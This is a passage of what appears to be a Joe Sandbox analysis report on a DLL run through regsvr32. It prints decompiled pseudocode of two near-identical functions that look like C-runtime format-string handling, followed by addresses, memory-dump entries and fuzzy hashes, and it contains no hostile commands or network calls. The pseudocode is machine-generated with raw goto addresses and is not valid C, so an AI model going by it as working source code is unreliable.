                                                                      				 *((intOrPtr*)(_t311 + 0x30)) = 0x10;
                                                                      				 *((intOrPtr*)(_t311 + 0x34)) = 0xb;
                                                                      				goto 0x8000a7dd;
                                                                      				_t179 =  *(_t311 + 0x28);
                                                                      				if ((r12b & _t179 >> 0x00000005) == 0) goto 0x8000a848;
                                                                      				asm("bts ecx, 0x7");
                                                                      				 *(_t309 + 0x28) = _t179;
                                                                      				_t312 = _t309;
                                                                      				E0000000118001E038(0, _t309, _t312, _t333, _t336);
                                                                      				goto 0x8000a86d;
                                                                      				E0000000118000B114(_t309, _t312);
                                                                      				goto 0x8000a86d;
                                                                      				 *(_t312 + 0x28) =  *(_t312 + 0x28) | 0x00000010;
                                                                      				E0000000118001E224(0, _t309, _t312, _t333, _t336);
                                                                      				goto 0x8000a86d;
                                                                      				_t141 = E0000000118000AE5C(0, _t309, _t312, _t336);
                                                                      				r13d = 0;
                                                                      				if (_t141 != 0) goto 0x8000a87b;
                                                                      				goto 0x8000abd7;
                                                                      				if ( *((intOrPtr*)(_t309 + 0x38)) != r13b) goto 0x8000abd4;
                                                                      				_t180 =  *(_t309 + 0x28);
                                                                      				_v68 = 0;
                                                                      				_v64 = 0;
                                                                      				r10d = 0x20;
                                                                      				if ((r12b & 0) == 0) goto 0x8000a8d9;
                                                                      				if ((r12b & 0) == 0) goto 0x8000a8bb;
                                                                      				_v68 = _t355 + 0xd;
                                                                      				goto 0x8000a8d6;
                                                                      				if ((r12b & _t180) == 0) goto 0x8000a8c7;
                                                                      				goto 0x8000a8b4;
                                                                      				if ((r12b & 0) == 0) goto 0x8000a8d9;
                                                                      				_v68 = r10w;
                                                                      				_t330 = _t358;
                                                                      				_t211 =  *(_t309 + 0x3a) & 0x0000ffff;
                                                                      				r9d = 0xffdf;
                                                                      				if ((r9w & (_t211 & 0x0000ffff) - _t223) != 0) goto 0x8000a8fc;
                                                                      				r8b = r12b;
                                                                      				if ((r12b & 0) != 0) goto 0x8000a8ff;
                                                                      				r8b = r13b;
                                                                      				r9d = 0x30;
                                                                      				if (r8b != 0) goto 0x8000a918;
                                                                      				if (0 == 0) goto 0x8000a935;
                                                                      				 *(_t343 + 0x34 + _t330 * 2) = r9w;
                                                                      				if (_t211 == _t223) goto 0x8000a929;
                                                                      				if (_t211 != 0x41) goto 0x8000a92c;
                                                                      				 *((short*)(_t343 + 0x36 + _t330 * 2)) = _t223 & 0x0000ffff;
                                                                      				r15d =  *((intOrPtr*)(_t309 + 0x2c));
                                                                      				r14d = 0xffff;
                                                                      				r15d = r15d -  *((intOrPtr*)(_t309 + 0x48));
                                                                      				r15d = r15d - _t214;
                                                                      				if ((_t180 & 0x0000000c) != 0) goto 0x8000a9b0;
                                                                      				if (r15d <= 0) goto 0x8000a9b0;
                                                                      				if ((r12b &  *( *((intOrPtr*)(_t309 + 0x460)) + 0x14) >> 0x0000000c) == 0) goto 0x8000a976;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t309 + 0x460)) + 8)) == _t360) goto 0x8000a994;
                                                                      				if (E0000000118003EB68(r10d, _t211, _t309,  *((intOrPtr*)(_t309 + 0x460)),  *((intOrPtr*)(_t309 + 8)), _t351) == r14w) goto 0x8000a9ac;
                                                                      				r10d = 0x20;
                                                                      				 *(_t309 + 0x20) = _t312 + 1;
                                                                      				if ( *(_t309 + 0x20) == 0xfffffffe) goto 0x8000a9b0;
                                                                      				if (r13d + r12d - r15d < 0) goto 0x8000a957;
                                                                      				goto 0x8000a9b0;
                                                                      				 *(_t309 + 0x20) =  *(_t309 + 0x20) | 0xffffffff;
                                                                      				_t362 = _t309 + 0x460;
                                                                      				_t334 = _t309 + 0x20;
                                                                      				if ((r12b &  *( *_t362 + 0x14) >> 0x0000000c) == 0) goto 0x8000a9da;
                                                                      				if ( *((intOrPtr*)( *_t362 + 8)) != _t360) goto 0x8000a9da;
                                                                      				 *_t334 =  *_t334 + _t214;
                                                                      				goto 0x8000a9f2;
                                                                      				_v88 =  *((intOrPtr*)(_t309 + 8));
                                                                      				r8d = _t214;
                                                                      				_t313 = _t362;
                                                                      				E00000001180009E20(_t309, _t313,  &_v68, _t334,  *((intOrPtr*)(_t309 + 8)), _t334);
                                                                      				if ((r12b & 0) == 0) goto 0x8000aa5d;
                                                                      				if ((r12b &  *(_t309 + 0x28) >> 0x00000002) != 0) goto 0x8000aa5d;
                                                                      				if (r15d <= 0) goto 0x8000aa5d;
                                                                      				if ((r12b &  *( *_t362 + 0x14) >> 0x0000000c) == 0) goto 0x8000aa2a;
                                                                      				if ( *((intOrPtr*)( *_t362 + 8)) == _t360) goto 0x8000aa44;
                                                                      				if (E0000000118003EB68(0x30, _t211, _t309,  *_t362,  *((intOrPtr*)(_t309 + 8)), _t334) == 0xffff) goto 0x8000aa5a;
                                                                      				_t83 = _t313 + 1; // 0x10000
                                                                      				 *_t334 = _t83;
                                                                      				if ( *_t334 == 0xfffffffe) goto 0x8000aa5d;
                                                                      				if (r13d + r12d - r15d < 0) goto 0x8000aa13;
                                                                      				goto 0x8000aa5d;
                                                                      				 *_t334 =  *_t334 | 0xffffffff;
                                                                      				if ( *((intOrPtr*)(_t309 + 0x4c)) != r13b) goto 0x8000ab8e;
                                                                      				if ( *((intOrPtr*)(_t309 + 0x48)) <= 0) goto 0x8000ab8e;
                                                                      				_t361 =  *((intOrPtr*)(_t309 + 8));
                                                                      				if ( *((intOrPtr*)(_t361 + 0x28)) != 0) goto 0x8000aa8b;
                                                                      				E00000001180006E80( *_t362, _t309, _t361,  *_t362, _t334);
                                                                      				if ( *((intOrPtr*)(_t309 + 0x48)) == 0) goto 0x8000ab10;
                                                                      				_v72 = 0;
                                                                      				_t315 =  &_v72;
                                                                      				if (E0000000118003E80C(0, _t223, _t309, _t315,  *((intOrPtr*)(_t309 + 0x40)), _t330 + 2, _t334,  *((intOrPtr*)(_t309 + 0x40)),  *((intOrPtr*)( *((intOrPtr*)(_t361 + 0x18)) + 8)),  *((intOrPtr*)(_t309 + 8))) <= 0) goto 0x8000ab82;
                                                                      				if (( *( *_t362 + 0x14) >> 0x0000000c & 0x00000001) == 0) goto 0x8000aadf;
                                                                      				if ( *((long long*)( *_t362 + 8)) == 0) goto 0x8000aaf1;
                                                                      				if (E0000000118003EB68(_v72 & 0x0000ffff,  *( *_t362 + 0x14) >> 0xc, _t309,  *_t362,  *((intOrPtr*)(_t309 + 8)),  *((intOrPtr*)(_t309 + 8))) == 0xffff) goto 0x8000aaf6;
                                                                      				 *(_t309 + 0x20) =  *(_t309 + 0x20) + 1;
                                                                      				goto 0x8000aafa;
                                                                      				 *(_t309 + 0x20) =  *(_t309 + 0x20) | 0xffffffff;
                                                                      				r12d = 1;
                                                                      				if (0 + r12d !=  *((intOrPtr*)(_t309 + 0x48))) goto 0x8000aa95;
                                                                      				r13d = 0;
                                                                      				if ( *_t334 - r13d < 0) goto 0x8000abd4;
                                                                      				if ((r12b & 0) == 0) goto 0x8000abd4;
                                                                      				if (r15d <= 0) goto 0x8000abd4;
                                                                      				if ((r12b &  *( *_t362 + 0x14) >> 0x0000000c) == 0) goto 0x8000ab52;
                                                                      				if ( *((intOrPtr*)( *_t362 + 8)) == _t361) goto 0x8000ab6c;
                                                                      				if (E0000000118003EB68(0x20,  *( *_t362 + 0x14) >> 0xc, _t309,  *_t362,  *((intOrPtr*)(_t309 + 8)),  *((intOrPtr*)(_t309 + 8))) == 0xffff) goto 0x8000abd1;
                                                                      				_t115 = _t315 + 1; // 0x10000
                                                                      				 *_t334 = _t115;
                                                                      				if ( *_t334 == 0xfffffffe) goto 0x8000abd4;
                                                                      				if (r13d + r12d - r15d < 0) goto 0x8000ab3b;
                                                                      				goto 0x8000abd4;
                                                                      				 *(_t309 + 0x20) =  *(_t309 + 0x20) | 0xffffffff;
                                                                      				r12d = 1;
                                                                      				goto 0x8000ab10;
                                                                      				r8d =  *((intOrPtr*)(_t309 + 0x48));
                                                                      				if ((r12b &  *( *_t362 + 0x14) >> 0x0000000c) == 0) goto 0x8000abb9;
                                                                      				if ( *((intOrPtr*)( *_t362 + 8)) != _t361) goto 0x8000abb9;
                                                                      				 *_t334 =  *_t334 + r8d;
                                                                      				goto 0x8000ab13;
                                                                      				_v88 =  *((intOrPtr*)(_t309 + 8));
                                                                      				E00000001180009E20(_t309, _t362,  *((intOrPtr*)(_t309 + 0x40)), _t334,  *((intOrPtr*)(_t309 + 0x40)) + _t168, _t334);
                                                                      				goto 0x8000ab13;
                                                                      				 *_t334 =  *_t334 | 0xffffffff;
                                                                      				return E00000001180002FB0(r12b,  *( *_t362 + 0x14) >> 0xc, _v56 ^ _t343);
                                                                      			}




































                                                                      0x18000a734
                                                                      0x18000a734
                                                                      0x18000a734
                                                                      0x18000a734
                                                                      0x18000a734
                                                                      0x18000a734
                                                                      0x18000a739
                                                                      0x18000a73e
                                                                      0x18000a74c
                                                                      0x18000a750
                                                                      0x18000a75a
                                                                      0x18000a75f
                                                                      0x18000a768
                                                                      0x18000a76b
                                                                      0x18000a76b
                                                                      0x18000a76e
                                                                      0x18000a76e
                                                                      0x18000a772
                                                                      0x18000a776
                                                                      0x18000a778
                                                                      0x18000a782
                                                                      0x18000a78c
                                                                      0x18000a792
                                                                      0x18000a79c
                                                                      0x18000a7a6
                                                                      0x18000a7ab
                                                                      0x18000a7b1
                                                                      0x18000a7b7
                                                                      0x18000a7c1
                                                                      0x18000a7c9
                                                                      0x18000a7ce
                                                                      0x18000a7d3
                                                                      0x18000a7d8
                                                                      0x18000a7e0
                                                                      0x18000a7e5
                                                                      0x18000a7ee
                                                                      0x18000a7f4
                                                                      0x18000a7fa
                                                                      0x18000a800
                                                                      0x18000a806
                                                                      0x18000a80c
                                                                      0x18000a812
                                                                      0x18000a817
                                                                      0x18000a81b
                                                                      0x18000a81d
                                                                      0x18000a822
                                                                      0x18000a824
                                                                      0x18000a82b
                                                                      0x18000a832
                                                                      0x18000a834
                                                                      0x18000a83f
                                                                      0x18000a841
                                                                      0x18000a845
                                                                      0x18000a84a
                                                                      0x18000a84d
                                                                      0x18000a852
                                                                      0x18000a854
                                                                      0x18000a859
                                                                      0x18000a85b
                                                                      0x18000a861
                                                                      0x18000a866
                                                                      0x18000a868
                                                                      0x18000a86d
                                                                      0x18000a872
                                                                      0x18000a876
                                                                      0x18000a87f
                                                                      0x18000a885
                                                                      0x18000a88a
                                                                      0x18000a891
                                                                      0x18000a896
                                                                      0x18000a8a4
                                                                      0x18000a8ae
                                                                      0x18000a8b4
                                                                      0x18000a8b9
                                                                      0x18000a8be
                                                                      0x18000a8c5
                                                                      0x18000a8ce
                                                                      0x18000a8d0
                                                                      0x18000a8d6
                                                                      0x18000a8d9
                                                                      0x18000a8dd
                                                                      0x18000a8ed
                                                                      0x18000a8f1
                                                                      0x18000a8fa
                                                                      0x18000a8fc
                                                                      0x18000a906
                                                                      0x18000a912
                                                                      0x18000a916
                                                                      0x18000a918
                                                                      0x18000a921
                                                                      0x18000a927
                                                                      0x18000a92c
                                                                      0x18000a935
                                                                      0x18000a939
                                                                      0x18000a93f
                                                                      0x18000a943
                                                                      0x18000a949
                                                                      0x18000a955
                                                                      0x18000a967
                                                                      0x18000a974
                                                                      0x18000a98c
                                                                      0x18000a98e
                                                                      0x18000a99a
                                                                      0x18000a9a0
                                                                      0x18000a9a8
                                                                      0x18000a9aa
                                                                      0x18000a9ac
                                                                      0x18000a9b4
                                                                      0x18000a9be
                                                                      0x18000a9cb
                                                                      0x18000a9d4
                                                                      0x18000a9d6
                                                                      0x18000a9d8
                                                                      0x18000a9da
                                                                      0x18000a9e7
                                                                      0x18000a9ea
                                                                      0x18000a9ed
                                                                      0x18000a9fd
                                                                      0x18000aa05
                                                                      0x18000aa11
                                                                      0x18000aa1f
                                                                      0x18000aa28
                                                                      0x18000aa42
                                                                      0x18000aa46
                                                                      0x18000aa49
                                                                      0x18000aa4e
                                                                      0x18000aa56
                                                                      0x18000aa58
                                                                      0x18000aa5a
                                                                      0x18000aa61
                                                                      0x18000aa6c
                                                                      0x18000aa72
                                                                      0x18000aa7c
                                                                      0x18000aa81
                                                                      0x18000aa93
                                                                      0x18000aaa0
                                                                      0x18000aaa5
                                                                      0x18000aab8
                                                                      0x18000aad3
                                                                      0x18000aadd
                                                                      0x18000aaef
                                                                      0x18000aaf1
                                                                      0x18000aaf4
                                                                      0x18000aaf6
                                                                      0x18000aafd
                                                                      0x18000ab0e
                                                                      0x18000ab10
                                                                      0x18000ab16
                                                                      0x18000ab25
                                                                      0x18000ab35
                                                                      0x18000ab47
                                                                      0x18000ab50
                                                                      0x18000ab6a
                                                                      0x18000ab6e
                                                                      0x18000ab71
                                                                      0x18000ab76
                                                                      0x18000ab7e
                                                                      0x18000ab80
                                                                      0x18000ab82
                                                                      0x18000ab86
                                                                      0x18000ab8c
                                                                      0x18000ab95
                                                                      0x18000aba6
                                                                      0x18000abaf
                                                                      0x18000abb1
                                                                      0x18000abb4
                                                                      0x18000abb9
                                                                      0x18000abc7
                                                                      0x18000abcc
                                                                      0x18000abd1
                                                                      0x18000ac01

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4f6f6f627f197439ce50e241d52a63fe1113d84182f7b30f3645d6abe47c0605
                                                                      • Instruction ID: 2456db7b643b7c8f1bb2dd83a12b4810dbdd9a0d3e131876c0d8aaf780ed62cf
                                                                      • Opcode Fuzzy Hash: 4f6f6f627f197439ce50e241d52a63fe1113d84182f7b30f3645d6abe47c0605
                                                                      • Instruction Fuzzy Hash: 87E1BF3620864986FBEADE29C0503EA37A1F74EBD4F55C216AE46473D5DF35CA8AC301
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 60%
                                                                      			E0000000118000D3A0(intOrPtr __edi, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r10, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v40;
                                                                      				signed int _v56;
                                                                      				short _v64;
                                                                      				char _v68;
                                                                      				signed short _v72;
                                                                      				long long _v88;
                                                                      				void* __rdi;
                                                                      				signed int _t131;
                                                                      				void* _t134;
                                                                      				void* _t141;
                                                                      				unsigned int _t179;
                                                                      				signed char _t180;
                                                                      				signed short _t211;
                                                                      				intOrPtr _t214;
                                                                      				signed short _t223;
                                                                      				void* _t224;
                                                                      				signed long long _t293;
                                                                      				long long _t309;
                                                                      				long long _t311;
                                                                      				intOrPtr* _t312;
                                                                      				intOrPtr* _t313;
                                                                      				signed short* _t315;
                                                                      				signed long long _t330;
                                                                      				signed int* _t334;
                                                                      				void* _t342;
                                                                      				signed long long _t343;
                                                                      				void* _t345;
                                                                      				void* _t351;
                                                                      				void* _t355;
                                                                      				signed long long _t358;
                                                                      				void* _t360;
                                                                      				intOrPtr _t361;
                                                                      				intOrPtr* _t362;
                                                                      
                                                                      				_t355 = __r10;
                                                                      				_t336 = __rbp;
                                                                      				_t333 = __rsi;
                                                                      				_t311 = __rcx;
                                                                      				_t214 = __edi;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				_a32 = __rsi;
                                                                      				_t343 = _t342 - 0x50;
                                                                      				_t293 =  *0x80072078; // 0xc949cbcab002
                                                                      				_v56 = _t293 ^ _t343;
                                                                      				_t131 =  *(__rcx + 0x3a) & 0x0000ffff;
                                                                      				_t309 = __rcx;
                                                                      				_t6 = _t333 - 0x20; // 0x58
                                                                      				_t223 = _t6;
                                                                      				_t7 = _t333 - 0x77; // 0x1
                                                                      				r12d = _t7;
                                                                      				_t224 = _t131 - 0x64;
                                                                      				if (_t224 > 0) goto 0x8000d456;
                                                                      				if (_t224 == 0) goto 0x8000d4c7;
                                                                      				if (_t131 == 0x41) goto 0x8000d4d4;
                                                                      				if (_t131 == 0x43) goto 0x8000d433;
                                                                      				if (_t131 - 0x44 <= 0) goto 0x8000d4e0;
                                                                      				if (_t131 - 0x47 <= 0) goto 0x8000d4d4;
                                                                      				if (_t131 == 0x53) goto 0x8000d489;
                                                                      				if (_t131 == _t223) goto 0x8000d449;
                                                                      				if (_t131 == 0x5a) goto 0x8000d43f;
                                                                      				if (_t131 == 0x61) goto 0x8000d4d4;
                                                                      				if (_t131 != 0x63) goto 0x8000d4e0;
                                                                      				E0000000118000D878(__rcx, __rcx, __rdx, __rsi, _t345);
                                                                      				goto 0x8000d4d9;
                                                                      				E0000000118000D93C(__rcx, __rcx, _t333);
                                                                      				goto 0x8000d4d9;
                                                                      				_t134 = E0000000118001D23C(r12b, __rcx, __rcx, _t333, __rbp);
                                                                      				goto 0x8000d4d9;
                                                                      				if (_t134 - 0x67 <= 0) goto 0x8000d4d4;
                                                                      				if (_t134 == 0x69) goto 0x8000d4c7;
                                                                      				if (_t134 == 0x6e) goto 0x8000d4c0;
                                                                      				if (_t134 == 0x6f) goto 0x8000d4a0;
                                                                      				if (_t134 == 0x70) goto 0x8000d490;
                                                                      				if (_t134 == 0x73) goto 0x8000d489;
                                                                      				if (_t134 == 0x75) goto 0x8000d4cb;
                                                                      				if (_t134 != 0x78) goto 0x8000d4e0;
                                                                      				goto 0x8000d44c;
                                                                      				E0000000118000D9B8(__rcx, __rcx, _t333);
                                                                      				goto 0x8000d4d9;
                                                                      				 *((intOrPtr*)(_t311 + 0x30)) = 0x10;
                                                                      				 *((intOrPtr*)(_t311 + 0x34)) = 0xb;
                                                                      				goto 0x8000d449;
                                                                      				_t179 =  *(_t311 + 0x28);
                                                                      				if ((r12b & _t179 >> 0x00000005) == 0) goto 0x8000d4b4;
                                                                      				asm("bts ecx, 0x7");
                                                                      				 *(_t309 + 0x28) = _t179;
                                                                      				_t312 = _t309;
                                                                      				E0000000118001D428(0, _t309, _t312, _t333, _t336);
                                                                      				goto 0x8000d4d9;
                                                                      				E0000000118000DD80(_t309, _t312);
                                                                      				goto 0x8000d4d9;
                                                                      				 *(_t312 + 0x28) =  *(_t312 + 0x28) | 0x00000010;
                                                                      				E0000000118001D614(0, _t309, _t312, _t333, _t336);
                                                                      				goto 0x8000d4d9;
                                                                      				_t141 = E0000000118000DAC8(0, _t309, _t312, _t336);
                                                                      				r13d = 0;
                                                                      				if (_t141 != 0) goto 0x8000d4e7;
                                                                      				goto 0x8000d843;
                                                                      				if ( *((intOrPtr*)(_t309 + 0x38)) != r13b) goto 0x8000d840;
                                                                      				_t180 =  *(_t309 + 0x28);
                                                                      				_v68 = 0;
                                                                      				_v64 = 0;
                                                                      				r10d = 0x20;
                                                                      				if ((r12b & 0) == 0) goto 0x8000d545;
                                                                      				if ((r12b & 0) == 0) goto 0x8000d527;
                                                                      				_v68 = _t355 + 0xd;
                                                                      				goto 0x8000d542;
                                                                      				if ((r12b & _t180) == 0) goto 0x8000d533;
                                                                      				goto 0x8000d520;
                                                                      				if ((r12b & 0) == 0) goto 0x8000d545;
                                                                      				_v68 = r10w;
                                                                      				_t330 = _t358;
                                                                      				_t211 =  *(_t309 + 0x3a) & 0x0000ffff;
                                                                      				r9d = 0xffdf;
                                                                      				if ((r9w & (_t211 & 0x0000ffff) - _t223) != 0) goto 0x8000d568;
                                                                      				r8b = r12b;
                                                                      				if ((r12b & 0) != 0) goto 0x8000d56b;
                                                                      				r8b = r13b;
                                                                      				r9d = 0x30;
                                                                      				if (r8b != 0) goto 0x8000d584;
                                                                      				if (0 == 0) goto 0x8000d5a1;
                                                                      				 *(_t343 + 0x34 + _t330 * 2) = r9w;
                                                                      				if (_t211 == _t223) goto 0x8000d595;
                                                                      				if (_t211 != 0x41) goto 0x8000d598;
                                                                      				 *((short*)(_t343 + 0x36 + _t330 * 2)) = _t223 & 0x0000ffff;
                                                                      				r15d =  *((intOrPtr*)(_t309 + 0x2c));
                                                                      				r14d = 0xffff;
                                                                      				r15d = r15d -  *((intOrPtr*)(_t309 + 0x48));
                                                                      				r15d = r15d - _t214;
                                                                      				if ((_t180 & 0x0000000c) != 0) goto 0x8000d61c;
                                                                      				if (r15d <= 0) goto 0x8000d61c;
                                                                      				if ((r12b &  *( *((intOrPtr*)(_t309 + 0x460)) + 0x14) >> 0x0000000c) == 0) goto 0x8000d5e2;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t309 + 0x460)) + 8)) == _t360) goto 0x8000d600;
                                                                      				if (E0000000118003EB68(r10d, _t211, _t309,  *((intOrPtr*)(_t309 + 0x460)),  *((intOrPtr*)(_t309 + 8)), _t351) == r14w) goto 0x8000d618;
                                                                      				r10d = 0x20;
                                                                      				 *(_t309 + 0x20) = _t312 + 1;
                                                                      				if ( *(_t309 + 0x20) == 0xfffffffe) goto 0x8000d61c;
                                                                      				if (r13d + r12d - r15d < 0) goto 0x8000d5c3;
                                                                      				goto 0x8000d61c;
                                                                      				 *(_t309 + 0x20) =  *(_t309 + 0x20) | 0xffffffff;
                                                                      				_t362 = _t309 + 0x460;
                                                                      				_t334 = _t309 + 0x20;
                                                                      				if ((r12b &  *( *_t362 + 0x14) >> 0x0000000c) == 0) goto 0x8000d646;
                                                                      				if ( *((intOrPtr*)( *_t362 + 8)) != _t360) goto 0x8000d646;
                                                                      				 *_t334 =  *_t334 + _t214;
                                                                      				goto 0x8000d65e;
                                                                      				_v88 =  *((intOrPtr*)(_t309 + 8));
                                                                      				r8d = _t214;
                                                                      				_t313 = _t362;
                                                                      				E00000001180009E20(_t309, _t313,  &_v68, _t334,  *((intOrPtr*)(_t309 + 8)), _t334);
                                                                      				if ((r12b & 0) == 0) goto 0x8000d6c9;
                                                                      				if ((r12b &  *(_t309 + 0x28) >> 0x00000002) != 0) goto 0x8000d6c9;
                                                                      				if (r15d <= 0) goto 0x8000d6c9;
                                                                      				if ((r12b &  *( *_t362 + 0x14) >> 0x0000000c) == 0) goto 0x8000d696;
                                                                      				if ( *((intOrPtr*)( *_t362 + 8)) == _t360) goto 0x8000d6b0;
                                                                      				if (E0000000118003EB68(0x30, _t211, _t309,  *_t362,  *((intOrPtr*)(_t309 + 8)), _t334) == 0xffff) goto 0x8000d6c6;
                                                                      				_t83 = _t313 + 1; // 0x10000
                                                                      				 *_t334 = _t83;
                                                                      				if ( *_t334 == 0xfffffffe) goto 0x8000d6c9;
                                                                      				if (r13d + r12d - r15d < 0) goto 0x8000d67f;
                                                                      				goto 0x8000d6c9;
                                                                      				 *_t334 =  *_t334 | 0xffffffff;
                                                                      				if ( *((intOrPtr*)(_t309 + 0x4c)) != r13b) goto 0x8000d7fa;
                                                                      				if ( *((intOrPtr*)(_t309 + 0x48)) <= 0) goto 0x8000d7fa;
                                                                      				_t361 =  *((intOrPtr*)(_t309 + 8));
                                                                      				if ( *((intOrPtr*)(_t361 + 0x28)) != 0) goto 0x8000d6f7;
                                                                      				E00000001180006E80( *_t362, _t309, _t361,  *_t362, _t334);
                                                                      				if ( *((intOrPtr*)(_t309 + 0x48)) == 0) goto 0x8000d77c;
                                                                      				_v72 = 0;
                                                                      				_t315 =  &_v72;
                                                                      				if (E0000000118003E80C(0, _t223, _t309, _t315,  *((intOrPtr*)(_t309 + 0x40)), _t330 + 2, _t334,  *((intOrPtr*)(_t309 + 0x40)),  *((intOrPtr*)( *((intOrPtr*)(_t361 + 0x18)) + 8)),  *((intOrPtr*)(_t309 + 8))) <= 0) goto 0x8000d7ee;
                                                                      				if (( *( *_t362 + 0x14) >> 0x0000000c & 0x00000001) == 0) goto 0x8000d74b;
                                                                      				if ( *((long long*)( *_t362 + 8)) == 0) goto 0x8000d75d;
                                                                      				if (E0000000118003EB68(_v72 & 0x0000ffff,  *( *_t362 + 0x14) >> 0xc, _t309,  *_t362,  *((intOrPtr*)(_t309 + 8)),  *((intOrPtr*)(_t309 + 8))) == 0xffff) goto 0x8000d762;
                                                                      				 *(_t309 + 0x20) =  *(_t309 + 0x20) + 1;
                                                                      				goto 0x8000d766;
                                                                      				 *(_t309 + 0x20) =  *(_t309 + 0x20) | 0xffffffff;
                                                                      				r12d = 1;
                                                                      				if (0 + r12d !=  *((intOrPtr*)(_t309 + 0x48))) goto 0x8000d701;
                                                                      				r13d = 0;
                                                                      				if ( *_t334 - r13d < 0) goto 0x8000d840;
                                                                      				if ((r12b & 0) == 0) goto 0x8000d840;
                                                                      				if (r15d <= 0) goto 0x8000d840;
                                                                      				if ((r12b &  *( *_t362 + 0x14) >> 0x0000000c) == 0) goto 0x8000d7be;
                                                                      				if ( *((intOrPtr*)( *_t362 + 8)) == _t361) goto 0x8000d7d8;
                                                                      				if (E0000000118003EB68(0x20,  *( *_t362 + 0x14) >> 0xc, _t309,  *_t362,  *((intOrPtr*)(_t309 + 8)),  *((intOrPtr*)(_t309 + 8))) == 0xffff) goto 0x8000d83d;
                                                                      				_t115 = _t315 + 1; // 0x10000
                                                                      				 *_t334 = _t115;
                                                                      				if ( *_t334 == 0xfffffffe) goto 0x8000d840;
                                                                      				if (r13d + r12d - r15d < 0) goto 0x8000d7a7;
                                                                      				goto 0x8000d840;
                                                                      				 *(_t309 + 0x20) =  *(_t309 + 0x20) | 0xffffffff;
                                                                      				r12d = 1;
                                                                      				goto 0x8000d77c;
                                                                      				r8d =  *((intOrPtr*)(_t309 + 0x48));
                                                                      				if ((r12b &  *( *_t362 + 0x14) >> 0x0000000c) == 0) goto 0x8000d825;
                                                                      				if ( *((intOrPtr*)( *_t362 + 8)) != _t361) goto 0x8000d825;
                                                                      				 *_t334 =  *_t334 + r8d;
                                                                      				goto 0x8000d77f;
                                                                      				_v88 =  *((intOrPtr*)(_t309 + 8));
                                                                      				E00000001180009E20(_t309, _t362,  *((intOrPtr*)(_t309 + 0x40)), _t334,  *((intOrPtr*)(_t309 + 0x40)) + _t168, _t334);
                                                                      				goto 0x8000d77f;
                                                                      				 *_t334 =  *_t334 | 0xffffffff;
                                                                      				return E00000001180002FB0(r12b,  *( *_t362 + 0x14) >> 0xc, _v56 ^ _t343);
                                                                      			}




































                                                                      0x18000d3a0
                                                                      0x18000d3a0
                                                                      0x18000d3a0
                                                                      0x18000d3a0
                                                                      0x18000d3a0
                                                                      0x18000d3a0
                                                                      0x18000d3a5
                                                                      0x18000d3aa
                                                                      0x18000d3b8
                                                                      0x18000d3bc
                                                                      0x18000d3c6
                                                                      0x18000d3cb
                                                                      0x18000d3d4
                                                                      0x18000d3d7
                                                                      0x18000d3d7
                                                                      0x18000d3da
                                                                      0x18000d3da
                                                                      0x18000d3de
                                                                      0x18000d3e2
                                                                      0x18000d3e4
                                                                      0x18000d3ee
                                                                      0x18000d3f8
                                                                      0x18000d3fe
                                                                      0x18000d408
                                                                      0x18000d412
                                                                      0x18000d417
                                                                      0x18000d41d
                                                                      0x18000d423
                                                                      0x18000d42d
                                                                      0x18000d435
                                                                      0x18000d43a
                                                                      0x18000d43f
                                                                      0x18000d444
                                                                      0x18000d44c
                                                                      0x18000d451
                                                                      0x18000d45a
                                                                      0x18000d460
                                                                      0x18000d466
                                                                      0x18000d46c
                                                                      0x18000d472
                                                                      0x18000d478
                                                                      0x18000d47e
                                                                      0x18000d483
                                                                      0x18000d487
                                                                      0x18000d489
                                                                      0x18000d48e
                                                                      0x18000d490
                                                                      0x18000d497
                                                                      0x18000d49e
                                                                      0x18000d4a0
                                                                      0x18000d4ab
                                                                      0x18000d4ad
                                                                      0x18000d4b1
                                                                      0x18000d4b6
                                                                      0x18000d4b9
                                                                      0x18000d4be
                                                                      0x18000d4c0
                                                                      0x18000d4c5
                                                                      0x18000d4c7
                                                                      0x18000d4cd
                                                                      0x18000d4d2
                                                                      0x18000d4d4
                                                                      0x18000d4d9
                                                                      0x18000d4de
                                                                      0x18000d4e2
                                                                      0x18000d4eb
                                                                      0x18000d4f1
                                                                      0x18000d4f6
                                                                      0x18000d4fd
                                                                      0x18000d502
                                                                      0x18000d510
                                                                      0x18000d51a
                                                                      0x18000d520
                                                                      0x18000d525
                                                                      0x18000d52a
                                                                      0x18000d531
                                                                      0x18000d53a
                                                                      0x18000d53c
                                                                      0x18000d542
                                                                      0x18000d545
                                                                      0x18000d549
                                                                      0x18000d559
                                                                      0x18000d55d
                                                                      0x18000d566
                                                                      0x18000d568
                                                                      0x18000d572
                                                                      0x18000d57e
                                                                      0x18000d582
                                                                      0x18000d584
                                                                      0x18000d58d
                                                                      0x18000d593
                                                                      0x18000d598
                                                                      0x18000d5a1
                                                                      0x18000d5a5
                                                                      0x18000d5ab
                                                                      0x18000d5af
                                                                      0x18000d5b5
                                                                      0x18000d5c1
                                                                      0x18000d5d3
                                                                      0x18000d5e0
                                                                      0x18000d5f8
                                                                      0x18000d5fa
                                                                      0x18000d606
                                                                      0x18000d60c
                                                                      0x18000d614
                                                                      0x18000d616
                                                                      0x18000d618
                                                                      0x18000d620
                                                                      0x18000d62a
                                                                      0x18000d637
                                                                      0x18000d640
                                                                      0x18000d642
